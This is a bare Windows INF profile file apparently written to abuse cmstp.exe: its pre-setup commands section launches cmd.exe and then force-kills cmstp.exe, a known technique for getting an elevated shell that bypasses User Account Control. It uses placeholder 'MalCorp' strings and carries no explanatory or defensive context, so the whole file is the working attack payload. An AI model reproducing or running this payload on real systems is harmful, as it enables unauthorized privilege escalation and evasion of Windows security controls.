[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection
;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
;AddReg=Xnstall.AddReg.AllUsers
RegisterOCXs=RegisterOCXSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
c:\windows\system32\cmd.exe
taskkill /IM cmstp.exe /F

[Strings]
ServiceName="MalCorp"
ShortSvcName="malcorp"
DesktopGUID="{BC63D377-66BA-4935-BAD4-DD402D23A85A}"
UninstallAppTitle="MalCorp"
DesktopIcon=""
PhonebookPath=""
BeginPrompt="Do you want to remove MalCorp?"
EndPrompt="Successfully removed MalCorp."
DisplayLCID=1033
CmLCID=1033



